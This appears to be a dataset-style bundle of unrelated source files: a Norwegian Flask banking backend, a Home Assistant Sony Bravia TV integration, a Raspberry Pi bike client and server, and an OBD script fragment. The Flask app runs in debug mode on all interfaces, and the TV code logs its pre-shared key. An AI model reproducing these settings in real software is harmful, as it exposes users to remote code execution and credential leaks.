@app.route('/<bank>/transaksjon', methods=["POST", "PUT"])
def post_transaksjon(bank):
dto = request.json
krev_tilgang_til_bank(bank)
prev = db.transaksjoner.find_one({"_id": ObjectId(dto["id"])}) if request.method == "PUT" else None
if prev:
if prev["bank"] != bank:
raise BadRequest("Klienten gjorde PUT transaksjon/%s på id=%s, men denne IDen har bank=%s" % (bank, dto["id"], prev["bank"]))
if prev.get("deleted", False):
raise BadRequest("Klienten gjorde PUT transaksjon på id=%s, men denne transaksjonen er slettet" % dto["id"])
transaksjon = {
"bank": bank,
"fra": dto["fra"],
"til": dto["til"],
"belop": float(dto["belop"]),
"kommentar": dto["kommentar"] if "kommentar" in dto else "",
"timestamp": dateutil.parser.parse(dto["timestamp"])
}
if dto["valutta"] != "NOK":
belop_NOK, kurs, kursTimestamp = valutta.konverter_til_NOK(transaksjon["belop"], dto["valutta"], transaksjon["timestamp"])
opprinnligBelop = transaksjon["belop"]
transaksjon["belop"] = belop_NOK
transaksjon["valutta"] = {
"belop": opprinnligBelop,
"id": dto["valutta"],
"kurs": kurs,
"timestamp": kursTimestamp
}
if prev:
transaksjon["forgjenger"] = prev["_id"]
insertion = db.transaksjoner.insert_one(transaksjon)
if prev:
db.transaksjoner.find_one_and_update({"_id": prev["_id"]}, {"$set": {"etterkommer": insertion.inserted_id, "deleted": True}})
return no_content()
@app.route('/transaksjon/<transaksjonId>', methods=['DELETE'])
def delete_transaksjon(transaksjonId):
bank = db.transaksjoner.find_one({"_id": ObjectId(transaksjonId)})["bank"]
krev_tilgang_til_bank(bank)
db.transaksjoner.find_one_and_update({"_id": ObjectId(transaksjonId)}, {"$set": {"deleted": True}})
return no_content()
def etterkommere(transaksjon):
if "etterkommer" in transaksjon:
etterkommer = db.transaksjoner.find_one({"_id": ObjectId(transaksjon["etterkommer"])})
return [etterkommer] + etterkommere(etterkommer)
else:
return []
def forgjengere(transaksjon):
if "forgjenger" in transaksjon:
forgjenger = db.transaksjoner.find_one({"_id": ObjectId(transaksjon["forgjenger"])})
return forgjengere(forgjenger) + [forgjenger]
else:
return []
@app.route('/transaksjon/restore/<transaksjonId>', methods=['PUT'])
def restore_transaksjon(transaksjonId):
transaksjon = db.transaksjoner.find_one({"_id": ObjectId(transaksjonId)})
krev_tilgang_til_bank(transaksjon["bank"])
if not transaksjon.get("deleted", False):
raise Exception("Prøvde å restore transaksjon %s som ikke er slettet" % transaksjon["_id"])
if any(not t.get("deleted", False) for t in forgjengere(transaksjon) + etterkommere(transaksjon)):
raise Exception("Prøvde å restore transaksjon %s, men denne har en aktiv forgjenger eller etterkommer" % transaksjon["_id"])
db.transaksjoner.find_one_and_update({"_id": ObjectId(transaksjonId)}, {"$set": {"deleted": False}})
return no_content()
@app.route('/<bank>/transaksjoner', methods=['GET'])
def get_transaksjoner(bank):
krev_tilgang_til_bank(bank)
transaksjoner = db.transaksjoner.find({"bank": bank})
return json.dumps(map(dto.transaksjon, transaksjoner))
def hent_bruker_fra_db():
brukernavn = request.environ.get('REMOTE_USER') or "LAN"
bruker = db.brukere.find_one({"brukernavn": brukernavn})
if not bruker:
raise Forbidden("Bruker %s har ingen tilknytning til localbank" % brukernavn)
return bruker
@app.route("/kontekst")
@app.route("/<bank>/kontekst")
def get_kontekst(bank = None):
bruker = hent_bruker_fra_db()
bank = bank or bruker["defaultBank"]
if bank not in bruker["banker"]:
raise Forbidden("Du har ikke tilgang til bank '%s'" % bank)
kontoer = db.kontoer.find({"bank": bank})
return json.dumps({
"valgtBank": bank,
"bruker": {
"brukernavn": bruker["brukernavn"],
"banker": bruker["banker"],
"admin": bruker.get("admin", False)
},
"kontoer": map(dto.konto, kontoer),
"valuttaer": valuttaer
})
@app.route("/brukere", methods=["GET"])
def get_brukere():
krev_admin()
return json.dumps(map(lambda bruker: {
"brukernavn": bruker["brukernavn"],
"banker": bruker["banker"],
"defaultBank": bruker["defaultBank"]
}, db.brukere.find()))
@app.route("/brukere", methods = ["POST"])
def post_bruker():
krev_admin()
if "defaultBank" not in request.json:
raise BadRequest("Mangler default bank")
bruker = {
"brukernavn": request.json["brukernavn"],
"banker": request.json["banker"],
"defaultBank": request.json["defaultBank"]
}
if not bruker["defaultBank"] or bruker["defaultBank"] not in bruker["banker"]:
raise BadRequest("Default bank (%s) finnes ikke i banker: %s" % (bruker["defaultBank"], bruker["banker"]))
db.brukere.update({"brukernavn": bruker["brukernavn"]}, {"$set": bruker}, upsert=True)
return no_content()
@app.route("/banker")
def get_banker():
krev_admin()
alle_kontoer = list(db.kontoer.find())
def kontoer(bank): return filter(lambda konto: bank == konto["bank"], alle_kontoer)
return json.dumps(map(lambda bank: {
"navn": bank,
"kontoer": map(dto.konto, kontoer(bank))
}, set(map(lambda konto: konto["bank"], alle_kontoer))))
def flatten(lists):
return [y for x in lists for y in x]
@app.route("/banker", methods = ["POST"])
def post_bank():
krev_admin()
bankId = request.json["navn"]
kontoer = map(lambda konto: {
"bank": bankId,
"navn": konto["navn"],
"felles": konto["felles"]
}, request.json["kontoer"])
bank_finnes = bankId in db.kontoer.distinct("bank")
antall_felleskontoer = len(filter(lambda konto: konto["felles"], kontoer))
if antall_felleskontoer != 1:
raise BadRequest("Prøvde å %s bank med %d felleskontoer" % ("PUT-e" if bankId else "POST-e", antall_felleskontoer))
if bank_finnes:
eksisterende_kontoer = frozenset(map(lambda konto: konto["navn"], db.kontoer.find({"bank": bankId})))
nye_kontoer = frozenset(map(lambda konto: konto["navn"], kontoer))
fjernede_kontoer = eksisterende_kontoer.difference(nye_kontoer)
if fjernede_kontoer:
har_transaksjon = flatten(map(lambda konto: [{"fra": konto}, {"til": konto}], fjernede_kontoer))
transaksjoner = list(db.transaksjoner.find({"bank": bankId, "$or": har_transaksjon}))
if transaksjoner:
kontoer_i_transaksjoner = flatten(map(lambda t: [t["fra"], t["til"]], transaksjoner))
fjernede_kontoer_med_transaksjoner = filter(lambda k: k in kontoer_i_transaksjoner,fjernede_kontoer)
raise BadRequest("Kan ikke fjerne kontoer som har transaksjoner: %s" % json.dumps(fjernede_kontoer_med_transaksjoner))
db.kontoer.delete_many({"bank": bankId})
db.kontoer.insert_many(kontoer)
return no_content()
@app.route("/<bank>/konto", methods = ["PUT"])
def put_konto(bank):
krev_admin()
dto = request.json
gammel_konto = db.kontoer.find_one({"_id": ObjectId(dto["id"])})
if bank != gammel_konto["bank"]:
raise BadRequest("Kan ikke flytte konto til annen bank")
if dto["navn"] != gammel_konto["navn"]:
raise BadRequest("Kan ikke bytte navn på konto")
if dto["felles"] != gammel_konto["felles"]:
raise BadRequest("Kan ikke endre på felles")
ny_konto = {
"navn": dto["navn"],
"bank": bank,
"felles": dto["felles"]
}
if dto.get("til"):
ny_konto["til"] = dateutil.parser.parse(dto["til"])
if dto.get("fra"):
ny_konto["fra"] = dateutil.parser.parse(dto["fra"])
db.kontoer.update({"_id": ObjectId(dto["id"])}, ny_konto)
return no_content()
def krev_tilgang_til_bank(bank):
bruker = hent_bruker_fra_db()
if not bank in bruker["banker"] and not bruker.get("admin", False):
raise Forbidden("Du har ikke tilgang til bank '%s'" % bank)
def krev_admin():
if not hent_bruker_fra_db().get("admin", False):
raise Forbidden("Krever admintilgang")
def no_content():
return ("", 204)
@app.errorhandler(Exception)
def handle_error(error):
is_known_error = isinstance(error, ApiException)
app.log_exception(error)
status_code = error.status_code if is_known_error else 500
message = error.message if is_known_error else "%s: %s" % (type(error).__name__, error)
return (message, status_code)
if __name__ == '__main__':
app.run(debug=True,host='0.0.0.0', port=5000)
```
#### File: localbank/backend/errors.py
```python
class ApiException(Exception):
pass
class Forbidden(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 403
class NotFound(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 404
class BadRequest(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 400
``` |
{
"source": "89jd/media_player.braviatv_psk",
"score": 2
} |
#### File: custom_components/braviatv_psk/media_player.py
```python
import urllib.parse as urlparse
from urllib.parse import parse_qs
import logging
import asyncio
import homeassistant.helpers.config_validation as cv
import voluptuous as vol
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_HOST,
CONF_MAC,
CONF_NAME,
STATE_OFF,
STATE_ON,
)
from .const import (
DOMAIN,
CONF_12H,
CONF_24H,
CONF_PSK,
CONF_AMP,
CONF_ANDROID,
CONF_SOURCE_FILTER,
CONF_TIME_FORMAT,
CONF_USER_LABELS,
CONF_ENABLE_COOKIES,
CONF_USE_CEC_TITLES,
CONF_USE_CEC_URIS
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
try:
from homeassistant.components.media_player import MediaPlayerEntity
except ImportError:
from homeassistant.components.media_player import (
MediaPlayerDevice as MediaPlayerEntity
)
try:
from homeassistant.components.media_player.const import (
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_TURN_ON,
SUPPORT_TURN_OFF,
SUPPORT_VOLUME_MUTE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_VOLUME_STEP,
SUPPORT_VOLUME_SET,
SUPPORT_SELECT_SOURCE,
SUPPORT_STOP,
MEDIA_TYPE_TVSHOW,
)
except ImportError:
from homeassistant.components.media_player import (
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_TURN_ON,
SUPPORT_TURN_OFF,
SUPPORT_VOLUME_MUTE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_VOLUME_STEP,
SUPPORT_VOLUME_SET,
SUPPORT_SELECT_SOURCE,
SUPPORT_STOP,
MEDIA_TYPE_TVSHOW,
)
__version__ = "0.3.5"
_LOGGER = logging.getLogger(__name__)
SUPPORT_BRAVIA = (
SUPPORT_PAUSE
| SUPPORT_VOLUME_STEP
| SUPPORT_VOLUME_MUTE
| SUPPORT_VOLUME_SET
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_NEXT_TRACK
| SUPPORT_TURN_ON
| SUPPORT_TURN_OFF
| SUPPORT_PLAY_MEDIA
| SUPPORT_SELECT_SOURCE
| SUPPORT_PLAY
| SUPPORT_STOP
)
DEFAULT_NAME = "Sony Bravia TV"
DEVICE_CLASS_TV = "tv"
# Some additional info to show specific for Sony Bravia TV
TV_WAIT = "TV started, waiting for program info"
TV_APP_OPENED = "App opened"
TV_NO_INFO = "No info (resumed after pause or app opened)"
PLAY_MEDIA_OPTIONS = [
"Num1",
"Num2",
"Num3",
"Num4",
"Num5",
"Num6",
"Num7",
"Num8",
"Num9",
"Num0",
"Num11",
"Num12",
"Netflix",
"Red",
"Green",
"Yellow",
"Blue",
"ChannelUp",
"ChannelDown",
"Up",
"Down",
"Left",
"Right",
"Display",
"Tv",
"Confirm",
"Home",
"EPG",
"Return",
"Options",
"Exit",
"Teletext",
"Input",
"TvPause",
"Play",
"Pause",
"Stop",
"HDMI 1",
"HDMI 2",
"HDMI 3",
"HDMI 4",
"SleepTimer",
"GooglePlay",
]
SERVICE_BRAVIA_COMMAND = "bravia_command"
SERVICE_BRAVIA_LIST_APPS ="bravia_list_apps"
SERVICE_BRAVIA_OPEN_APP = "bravia_open_app"
ATTR_COMMAND_ID = "command_id"
ATTR_URI = "uri"
BRAVIA_COMMAND_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_COMMAND_ID): cv.string,
}
)
BRAVIA_OPEN_APP_SCHEMA = vol.Schema(
{vol.Required(ATTR_ENTITY_ID): cv.entity_ids, vol.Required(ATTR_URI): cv.string}
)
BRAVIA_LIST_APPS_SCHEMA = vol.Schema(
{vol.Required(ATTR_ENTITY_ID): cv.entity_ids})
# pylint: disable=unused-argument
def convert_time_format(time_format, time_raw):
"""Convert time format."""
if time_format == CONF_12H:
hours, minutes = time_raw.split(":")
hours, minutes = int(hours), int(minutes)
setting = "AM"
if hours > 12:
setting = "PM"
hours -= 12
elif hours == 0:
hours = 12
return "{}:{:02d} {}".format(hours, minutes, setting)
return time_raw
def remove_app_entities(hass):
for entity_id in hass.states.async_entity_ids(domain_filter='app'):
hass.states.async_remove(entity_id)
async def async_setup_entry(hass: HomeAssistant, config: ConfigEntry, async_add_devices, discovery_info=None):
"""Set up the Sony Bravia TV platform."""
host = config.data.get(CONF_HOST)
psk = config.data.get(CONF_PSK)
mac = config.data.get(CONF_MAC)
name = config.data.get(CONF_NAME)
amp = config.data.get(CONF_AMP)
android = config.data.get(CONF_ANDROID)
source_filter = config.data.get(CONF_SOURCE_FILTER)
time_format = config.data.get(CONF_TIME_FORMAT)
user_labels = config.data.get(CONF_USER_LABELS)
enable_cookies = config.data.get(CONF_ENABLE_COOKIES)
use_cec_titles = config.data.get(CONF_USE_CEC_TITLES)
use_cec_uris = config.data.get(CONF_USE_CEC_URIS)
if host is None or psk is None:
_LOGGER.error("No TV IP address or Pre-Shared Key found in configuration file")
return
from braviarc import braviarc
braviarc = braviarc.BraviaRC(host, psk, mac)
sys_info = await hass.async_add_executor_job(
braviarc.get_system_info
)
unique_id = sys_info['serial']
model = sys_info['model']
device = BraviaTVEntity(
braviarc, unique_id, model, host, psk, mac, name, amp, android, source_filter, time_format, user_labels, enable_cookies, use_cec_titles, use_cec_uris
)
async_add_devices([device])
def send_command(call):
"""Send command to TV."""
command_id = call.data.get(ATTR_COMMAND_ID)
device.send_command(command_id)
def open_app(call):
"""Open app on TV."""
uri = call.data.get(ATTR_URI)
device.open_app(uri)
def list_apps(call):
device.list_apps()
hass.services.async_register(
DOMAIN, SERVICE_BRAVIA_COMMAND, send_command, schema=BRAVIA_COMMAND_SCHEMA
)
# Only add the open_app service when TV is Android
if android:
hass.services.async_register(
DOMAIN, SERVICE_BRAVIA_OPEN_APP, open_app, schema=BRAVIA_OPEN_APP_SCHEMA
)
hass.services.async_register(
DOMAIN, SERVICE_BRAVIA_LIST_APPS, list_apps, schema=BRAVIA_LIST_APPS_SCHEMA
)
remove_app_entities(hass)
class BraviaTVEntity(MediaPlayerEntity):
"""Representation of a Sony Bravia TV."""
def __init__(
self,
braviarc,
unique_id,
model,
host,
psk,
mac,
name,
amp,
android,
source_filter,
time_format,
user_labels,
enable_cookies,
use_cec_titles,
use_cec_uris
):
"""Initialize the Sony Bravia device."""
_LOGGER.info("Setting up Sony Bravia TV")
self._braviarc = braviarc
self._name = name
self._amp = amp
self._android = android
self._source_filter = source_filter
self._state = STATE_OFF
self._muted = False
self._program_name = None
self._channel_name = None
self._channel_number = None
self._source = None
self._source_list = []
self._label_list = []
self._content_mapping = {}
self._duration = None
self._content_uri = None
self._playing = False
self._start_date_time = None
self._program_media_type = None
self._min_volume = None
self._max_volume = None
self._volume = None
self._start_time = None
self._end_time = None
self._device_class = DEVICE_CLASS_TV
self._time_format = time_format
self._user_labels = user_labels
self._enable_cookies = enable_cookies
self._app_list = []
self._use_cec_titles = use_cec_titles
self._use_cec_uris = use_cec_uris
self._unique_id = unique_id
self._model = model
_LOGGER.debug(
"Set up Sony Bravia TV with IP: %s, PSK: %s, MAC: %s, Serial: %s", host, psk, mac, unique_id
)
async def async_update(self):
"""Update TV info."""
try:
if self._enable_cookies and not self._braviarc.is_connected():
await self.hass.async_add_executor_job(
self._braviarc.connect, None, 'hass', 'Home assistant'
)
power_status = await self.hass.async_add_executor_job(
self._braviarc.get_power_status
)
if not self._app_list or power_status == "active":
app_list = await self.hass.async_add_executor_job(
self._braviarc.load_app_list
)
if self._app_list != app_list:
self._app_list = app_list
remove_app_entities(self.hass)
for app in self._app_list:
app_entity_name = app['title']
app_entity_name = ''.join(e for e in app_entity_name if e.isalnum())
app_entity_name = 'app.%s_%s' % (app_entity_name, self._unique_id)
self.hass.states.async_set(app_entity_name, None, {
'name': app['title'],
'entity_picture' : app['icon'] ,
'friendly_name': app['title'].replace(' ', '\n'),
'package': app['uri'],
})
if not self._source_list or power_status == "active":
await self._refresh_channels()
if power_status == "active":
self._state = STATE_ON
await self._refresh_volume()
playing_info = await self.hass.async_add_executor_job(
self._braviarc.get_playing_info
)
self._reset_playing_info()
if playing_info is None or not playing_info:
self._program_name = TV_NO_INFO
else:
self._program_name = playing_info.get("programTitle")
self._channel_name = playing_info.get("title")
self._program_media_type = playing_info.get("programMediaType")
self._channel_number = playing_info.get("dispNum")
self._source = playing_info.get("title")
self._content_uri = playing_info.get("uri")
self._duration = playing_info.get("durationSec")
self._start_date_time = playing_info.get("startDateTime")
# Get time info from TV program
if self._start_date_time and self._duration:
time_info = self._braviarc.playing_time(
self._start_date_time, self._duration
)
self._start_time = time_info.get("start_time")
self._end_time = time_info.get("end_time")
elif self._program_name == TV_WAIT:
# TV is starting up, takes some time before it responds
_LOGGER.info("TV is starting, no info available yet")
# elif power_status == "standby":
# self._refresh_channels()
# self._state = STATE_OFF
else:
self._state = STATE_OFF
except Exception as exception_instance: # pylint: disable=broad-except
_LOGGER.exception(
"No data received from TV."
)
self._state = STATE_OFF
def _reset_playing_info(self):
self._program_name = None
self._channel_name = None
self._program_media_type = None
self._channel_number = None
self._source = None
self._content_uri = None
self._duration = None
self._start_date_time = None
self._start_time = None
self._end_time = None
async def _refresh_volume(self):
"""Refresh volume information."""
volume_info = await self.hass.async_add_executor_job(self._braviarc.get_volume_info)
if volume_info is not None:
self._volume = volume_info.get("volume")
self._min_volume = volume_info.get("minVolume")
self._max_volume = volume_info.get("maxVolume")
self._muted = volume_info.get("mute")
async def _refresh_channels(self):
def is_hdmi(uri):
return uri.startswith('extInput:hdmi')
def is_cec(uri):
return uri.startswith('extInput:cec')
self._content_mapping = await self.hass.async_add_executor_job(self._braviarc.load_source_list)
self._source_list = []
external_inputs = []
if self._source_filter: # list is not empty
filtered_dict = {
title: uri
for (title, uri) in self._content_mapping.items()
if any(
filter_title in title for filter_title in self._source_filter
)
}
for title, uri in self._content_mapping.items():
if is_hdmi(uri) or is_cec(uri):
external_inputs.append((title, uri))
else:
self._source_list.append(title)
merged_inputs = {}
for title, uri in external_inputs:
port = parse_qs(urlparse.urlparse(uri).query)['port'][0]
if port in merged_inputs:
merged_item = merged_inputs[port]
else:
merged_item = {}
if is_hdmi(uri):
merged_item['hdmi_title'] = title
merged_item['hdmi_uri'] = uri
else:
merged_item['cec_title'] = title
merged_item['cec_uri'] = uri
merged_inputs[port] = merged_item
for port, data in merged_inputs.items():
hdmi_title = data.get('hdmi_title')
hdmi_uri = data.get('hdmi_uri')
cec_title = data.get('cec_title')
cec_uri = data.get('cec_uri')
if hdmi_uri and cec_uri:
title = cec_title if self._use_cec_titles else hdmi_title
uri = cec_uri if self._use_cec_uris else hdmi_uri
elif not hdmi_uri and not cec_uri:
continue
else:
uri = hdmi_uri if hdmi_uri else cec_uri
title = hdmi_title if hdmi_title else cec_title
self._source_list.append(title)
if not self._label_list:
self._label_list = await self.hass.async_add_executor_job(self._braviarc.get_current_external_input_status)
if self._label_list:
for key in self._source_list:
label = self._convert_title_to_label(key)
if label != key:
self._source_list.insert(self._source_list.index(key), label)
self._source_list.remove(key)
@property
def name(self):
"""Return the name of the entity."""
return self._name
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._unique_id
@property
def state(self):
"""Return the state of the entity."""
return self._state
@property
def source(self):
"""Return the current input source."""
return self._convert_title_to_label(self._source)
@property
def source_list(self):
"""List of available input sources."""
return self._source_list
@property
def volume_level(self):
"""Volume level of the media player (0..1)."""
if self._volume is not None:
return self._volume / 100
return None
@property
def is_volume_muted(self):
"""Boolean if volume is currently muted."""
return self._muted
@property
def supported_features(self):
"""Flag media player features that are supported."""
supported = SUPPORT_BRAVIA
# Remove volume slider if amplifier is attached to TV
if self._amp:
supported = supported ^ SUPPORT_VOLUME_SET
return supported
@property
def media_content_type(self):
"""Content type of current playing media.
Used for program information below the channel in the state card.
"""
return MEDIA_TYPE_TVSHOW
@property
def media_title(self):
"""Title of current playing media.
Used to show TV channel info.
"""
return_value = None
if self._channel_name is not None:
if self._channel_number is not None:
return_value = "{0!s}: {1}".format(
self._channel_number.lstrip("0"), self._channel_name
)
else:
return_value = self._channel_name
return self._convert_title_to_label(return_value)
@property
def media_series_title(self):
"""Title of series of current playing media, TV show only.
Used to show TV program info.
"""
return_value = None
if self._program_name is not None:
if self._start_time is not None and self._end_time is not None:
return_value = "{0} [{1} - {2}]".format(
self._program_name,
convert_time_format(self._time_format, self._start_time),
convert_time_format(self._time_format, self._end_time),
)
else:
return_value = self._program_name
else:
if not self._channel_name: # This is empty when app is opened
return_value = TV_APP_OPENED
return return_value
@property
def media_content_id(self):
"""Content ID of current playing media."""
return self._channel_name
@property
def device_class(self):
"""Return the device class of the media player."""
return self._device_class
@property
def state_attributes(self):
attributes = super().state_attributes
if not attributes:
return {
"app_list": self._app_list
}
else:
attributes['app_list'] = self._app_list
return attributes
@property
def device_info(self):
return {
"identifiers": {
# Serial numbers are unique identifiers within a specific domain
(DOMAIN, self._unique_id)
},
"name": self.name,
"manufacturer": 'Sony',
"model": self._model
}
async def async_set_volume_level(self, volume):
"""Set volume level, range 0..1."""
await self.hass.async_add_executor_job(
self._braviarc.set_volume_level, volume
)
async def async_turn_on(self):
"""Turn the media player on.
Use a different command for Android as WOL is not working.
"""
if self._android:
await self.hass.async_add_executor_job(
self._braviarc.turn_on_command
)
else:
await self.hass.async_add_executor_job(
self._braviarc.turn_on
)
# Show that TV is starting while it takes time
# before program info is available
self._reset_playing_info()
self._state = STATE_ON
self._program_name = TV_WAIT
async def async_turn_off(self):
"""Turn the media player off.
Use a different command for Android since IRCC is not working reliable.
"""
if self._android:
await self.hass.async_add_executor_job(
self._braviarc.turn_off_command
)
else:
await self.hass.async_add_executor_job(
self._braviarc.turn_off
)
async def async_volume_up(self):
"""Volume up the media player."""
await self.hass.async_add_executor_job(
self._braviarc.volume_up
)
async def volume_down(self):
"""Volume down media player."""
await self.hass.async_add_executor_job(
self._braviarc.volume_down
)
async def mute_volume(self, mute):
"""Send mute command."""
await self.hass.async_add_executor_job(
self._braviarc.mute_volume
)
async def select_source(self, source):
"""Set the input source."""
title = self._convert_label_to_title(source)
if title in self._content_mapping:
uri = self._content_mapping[title]
await self.hass.async_add_executor_job(
self._braviarc.play_content, uri
)
async def media_play_pause(self):
"""Simulate play pause media player."""
if self._playing:
await self.media_pause()
else:
await self.media_play()
async def media_play(self):
"""Send play command."""
self._playing = True
await self.hass.async_add_executor_job(
self._braviarc.media_play
)
async def media_pause(self):
"""Send media pause command to media player.
Will pause TV when TV tuner is on.
"""
self._playing = False
if self._program_media_type == "tv" or self._program_name is not None:
await self.hass.async_add_executor_job(
self._braviarc.media_tvpause
)
else:
await self.hass.async_add_executor_job(
self._braviarc.media_pause
)
async def media_next_track(self):
"""Send next track command.
Will switch to next channel when TV tuner is on.
"""
if self._program_media_type == "tv" or self._program_name is not None:
await self.hass.async_add_executor_job(
self._braviarc.send_command, "ChannelUp"
)
else:
await self.hass.async_add_executor_job(
self._braviarc.media_next_track
)
async def media_previous_track(self):
"""Send the previous track command.
Will switch to previous channel when TV tuner is on.
"""
if self._program_media_type == "tv" or self._program_name is not None:
await self.hass.async_add_executor_job(
self._braviarc.send_command, "ChannelDown"
)
else:
await self.hass.async_add_executor_job(
self._braviarc.media_previous_track
)
async def play_media(self, media_type, media_id, **kwargs):
"""Play media."""
_LOGGER.debug("Play media: %s (%s)", media_id, media_type)
if media_id in PLAY_MEDIA_OPTIONS:
await self.hass.async_add_executor_job(
self._braviarc.send_command, media_id
)
else:
_LOGGER.warning("Unsupported media_id: %s", media_id)
async def send_command(self, command_id):
"""Send arbitrary command to TV via HA service."""
if self._state == STATE_OFF:
return
await self.hass.async_add_executor_job(
self._braviarc.send_command, command_id
)
def open_app(self, uri):
self._braviarc.start_app(uri)
def list_apps(self):
"""Open app with given uri."""
app_list = self._braviarc.load_app_list()
return app_list
def _convert_title_to_label(self, title):
return_value = title
if self._user_labels:
for item in self._label_list:
if item["title"] == title and item["label"] != "":
return_value = item["label"]
return return_value
def _convert_label_to_title(self, label):
return_value = label
if self._user_labels:
for item in self._label_list:
if item["label"] == label and item["title"] != "":
return_value = item["title"]
return return_value
``` |
{
"source": "89jd/pi-bike-python-client",
"score": 2
} |
#### File: 89jd/pi-bike-python-client/client.py
```python
from frontend import DISPLAYS
from frontend.tracking import TrackingScreen
from remote import RemoteControlThread
from client import SocketClient
from threading import Thread
import time
import sys, signal
import config
import waveshare
from pi import ButtonSensor
output_property = config.properties.output_type
remote_properties = getattr(config.properties, 'remote', None)
pi_properties = getattr(config.properties, 'pi_gpio', None)
debug = len(sys.argv) > 1 and sys.argv[1] == 'debug'
if __name__ == "__main__":
socket_client = SocketClient()
output = DISPLAYS[output_property]
tracking_screen = TrackingScreen(socket_client, output=output)
def signal_handler(sig, frame):
sys.exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
try:
print('connect')
socket_client.start()
break
except Exception as e:
print(e)
pass
time.sleep(1)
def reset_exercise():
socket_client.emit('reset_exercise')
def toggle_pause_exercise():
socket_client.emit('toggle_pause')
def wake():
output.switch_backlight(True)
def delay_and_switch_off():
time.sleep(10)
if tracking_screen.is_idle:
output.switch_backlight(False)
Thread(daemon=True, target=delay_and_switch_off)
def button_name_to_lambda(button_name):
if button_name == 'reset_button':
return reset_exercise
elif button_name == 'pause_button':
return toggle_pause_exercise
elif button_name == 'wake_button':
return wake
if remote_properties:
button_to_action = {}
for key, value in vars(remote_properties.buttons).items():
button_to_action[value] = button_name_to_lambda(key)
def on_button_clicked(button, state):
if debug:
print(button, state)
action = button_to_action.get(button)
if action and state == 0:
action()
RemoteControlThread(remote_properties.device_id, on_button_clicked, debug=debug).start()
if pi_properties:
pin_to_action = {}
for key, value in vars(pi_properties.buttons).items():
pin_to_action[value.pin] = button_name_to_lambda(key)
def on_pin(pin: int):
action = pin_to_action.get(pin)
if action:
action()
ButtonSensor(vars(pi_properties.buttons).values(), on_pin=on_pin)
```
#### File: pi-bike-python-client/remote/__init__.py
```python
import evdev
import threading
import time
class RemoteControlThread(threading.Thread):
def __init__(self, device_id:str, on_key, debug: bool = False) -> None:
super().__init__(daemon=True)
self.device_id = device_id
self.on_key = on_key
self.debug = debug
def print_debug_log(self, s: str):
if self.debug:
print(s)
def run(self) -> None:
while True:
try:
device = evdev.InputDevice(self.device_id)
self.print_debug_log('Input device found')
for event in device.read_loop():
if event.type == evdev.ecodes.EV_KEY:
self.on_key(event.code, event.value)
except FileNotFoundError:
if self.debug:
self.print_debug_log('Input device not found')
time.sleep(1)
if __name__ == "__main__":
RemoteControlThread(print).start()
while True:
time.sleep(1)
``` |
{
"source": "89jd/pi-bike-server",
"score": 3
} |
#### File: pi-bike-server/firebase/__init__.py
```python
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
from firebase_admin import messaging
import uuid
from utils import print_debug
from config import properties
firebase_properties = getattr(properties, "firebase", None)
cred = credentials.Certificate("firebase.json")
firebase_admin.initialize_app(cred,)
class Firebase():
def __init__(self) -> None:
super().__init__()
def write_workout(self, workout: dict) -> None:
db = firestore.client()
db.collection(firebase_properties.collection).document(str(uuid.uuid4())).set({firebase_properties.list_values_key: workout})
def push_heartrate_request(self, start: bool) -> None:
# The topic name can be optionally prefixed with "/topics/".
topic = f"exercise"
# See documentation on defining a message payload.
message = messaging.Message(
data={'started': str(start)},
topic=topic,
)
print_debug(message)
# Send a message to the devices subscribed to the provided topic.
response = messaging.send(message)
print_debug(response)
if __name__ == "__main__":
Firebase().push_heartrate_request(True)
```
#### File: 89jd/pi-bike-server/server.py
```python
from server import BikeDataServer
from bikesensor import BikeSensor
from routine import BikeRoutine
import threading
import logging
from config import properties
from utils import print_debug, debug
if not debug:
log = logging.getLogger('werkzeug')
log.setLevel(logging.WARNING)
routine = None
gear = 8
def initialise_routine():
print_debug('Initialise routine')
global gear
global routine
if routine:
print_debug("stopping existing")
routine.stop()
routine = BikeRoutine(gear, lambda: BikeSensor(**vars(properties.revolution_sensor)))
routine.on_update = server.emit_exercise_data
routine.on_idle_cb = server.emit_idle_state
routine.on_duration_update = server.emit_duration
server.on_reset_exercise = lambda _: initialise_routine()
server.on_paused = lambda _: routine.force_pause()
server.on_resumed = lambda _: routine.resume()
def increase_gear():
global gear
gear += 1
server.emit_gear(gear)
routine.gear = gear
def decrease_gear():
global gear
gear -= 1
server.emit_gear(gear)
routine.gear = gear
server.on_gear_increased = lambda _: increase_gear()
server.on_gear_decreased = lambda _: decrease_gear()
server.on_heart_rate_received = lambda heart_rate: routine.publish_heartrate(heart_rate)
def toggle_pause():
if routine.paused:
routine.resume()
else:
routine.force_pause()
server.on_toggle_pause = lambda _: toggle_pause()
server.emit_gear(gear)
threading.Thread(target=routine.start, daemon=True).start()
print_debug('Start server')
server = BikeDataServer()
server.on_exercise_stopped = lambda _: initialise_routine()
initialise_routine()
server.on_connected = lambda _: print_debug('Client connected')
if __name__ == '__main__':
server.start()
``` |
{
"source": "8ahmedanwer8/ElectronOBD",
"score": 3
} |
#### File: ElectronOBD/python_engine/getData.py
```python
import obd
import obdHandler as obh
import json
import utils as u
import pandas as pd
from threading import Thread
import time
data = [] #the data exported as csv at the end
heading = []#headings for the csv, like the titles for each column
def main():#worker thread gets data for us while main thread keeps checking for input from main.js to break worker thread's loop
time.sleep(3) #we need this because running scripts from the terminal blocks the serial ports (to my surprise) so we wait until it stops blocking which i believe is the instant after the first lines are executed in the terminal or something
connection = obd.OBD()
supportedCommands,supportedCommandsNames, supportedCommandsUnits, _ = obh.getSupported(connection)
headingWithoutTimeColumn = obh.addUnitsToCSVHeading(supportedCommandsNames, supportedCommandsUnits)
headingWithoutTimeColumn.insert(0, "TIME")
heading.append(headingWithoutTimeColumn)
